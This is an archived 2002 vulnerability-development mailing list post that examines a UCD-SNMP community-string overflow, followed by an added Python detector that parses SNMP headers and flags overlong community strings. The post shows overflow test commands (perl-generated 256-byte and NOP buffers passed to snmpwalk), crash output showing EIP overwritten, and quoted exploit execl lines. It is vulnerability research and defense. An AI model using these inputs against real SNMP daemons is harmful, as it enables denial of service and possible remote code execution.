Vulnerability Development mailing list archives

Re: snmpd exploit examination - snmpwalk


From: Syzop <syz () dds nl>
Date: Thu, 21 Feb 2002 22:59:19 +0100

Hi,

KF wrote:

I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like
local exploits to me.

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1 17 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'`
Program received signal SIGSEGV, Segmentation fault.

I get the same results with: snmpwalk 127.0.0.1 public <long buffer>.
$ snmpwalk 127.0.0.1 public `perl -e 'print "A" x 3000'`
Segmentation fault
Feb 21 22:24:08 syzop kernel: pid 26942 (snmpwalk), uid 1001 exited on signal 11 reading or executing 0x41414141
However the exploit is doing: snmpwalk -p <port> <host> <long buffer>
[..]

These are the examples I have seen in various emails as methods to exploit snmpd... These seem to do
nothing on my box to the client or the daemon...

        snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
        execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
        execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);

I tested this after H D Moore's mail:
'The UCD-SNMP4.2.1 package is trivial to exploit. A community string of
exactly 256 bytes will smash eip.'
so:
$ snmpwalk 127.0.0.1 `perl -e 'print "A" x 256'`
(then, syslog reports:)
Feb 21 22:36:44 syzop kernel: pid 27154 (snmpd), uid 0 exited on signal 11 reading or executing 0x41414141
or at least here :)).
Tested on rh7.1 and debian 2.2 (both ia32).

Here are my results.

--snip--
Same results as here with your values.

It looks like it really has to be 256 chars here:
255 = nothing, 256 = EIP overwritten, 257 = nothing.

Give it too many chars and snmpwalk complains.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'`
snmpwalk: Error building ASN.1 representation

Same here after ~8200 chars.

Cya,

    Syzop.

PS: Resend since I forgot to include vuln-dev :P
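Added example (my own code, not from this thread or from UCD-SNMP): a minimal BER walk over the SNMPv1/v2c message header so a monitor can pick out community strings at the 256-byte length discussed above, which needs long-form BER lengths; the GetRequest packets it is run on are constructed inline for the demo.

```python
# Added example: parse the SNMPv1/v2c header and flag overlong community strings.

# The thread reports a community string of exactly 256 bytes crashing
# UCD-SNMP 4.2.1; flag anything at or above that length.
SUSPICIOUS_COMMUNITY_LEN = 256

def ber_len(data, pos):
    """Decode a BER length at pos; return (length, position after it)."""
    first = data[pos]
    if first < 0x80:                     # short form: one byte
        return first, pos + 1
    n = first & 0x7F                     # long form: next n bytes hold it
    if n == 0 or n > 4 or pos + 1 + n > len(data):
        raise ValueError("bad BER length")
    return int.from_bytes(data[pos + 1:pos + 1 + n], "big"), pos + 1 + n

def parse_community(pkt):
    """Return (version, community) from an SNMPv1/v2c message header."""
    if not pkt or pkt[0] != 0x30:        # outer SEQUENCE
        raise ValueError("not an SNMP message")
    _, pos = ber_len(pkt, 1)
    if pkt[pos] != 0x02:                 # INTEGER version (0 = v1, 1 = v2c)
        raise ValueError("missing version")
    vlen, pos = ber_len(pkt, pos + 1)
    version = int.from_bytes(pkt[pos:pos + vlen], "big")
    pos += vlen
    if pkt[pos] != 0x04:                 # OCTET STRING community
        raise ValueError("missing community")
    clen, pos = ber_len(pkt, pos + 1)
    if pos + clen > len(pkt):
        raise ValueError("truncated community")
    return version, pkt[pos:pos + clen]

def is_suspicious(pkt):
    """True when the community string is long enough to hit the bug."""
    return len(parse_community(pkt)[1]) >= SUSPICIOUS_COMMUNITY_LEN

def _tlv(tag, body):
    """BER-encode one element, using long-form length when needed."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def build_get_request(community):
    """Constructed SNMPv1 GetRequest for sysDescr.0 (demo input only)."""
    oid = b"\x06\x08\x2b\x06\x01\x02\x01\x01\x01\x00"
    varbinds = _tlv(0x30, _tlv(0x30, oid + b"\x05\x00"))   # OID + NULL
    pdu = _tlv(0xA0, b"\x02\x01\x01\x02\x01\x00\x02\x01\x00" + varbinds)
    return _tlv(0x30, b"\x02\x01\x00" + _tlv(0x04, community) + pdu)
```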
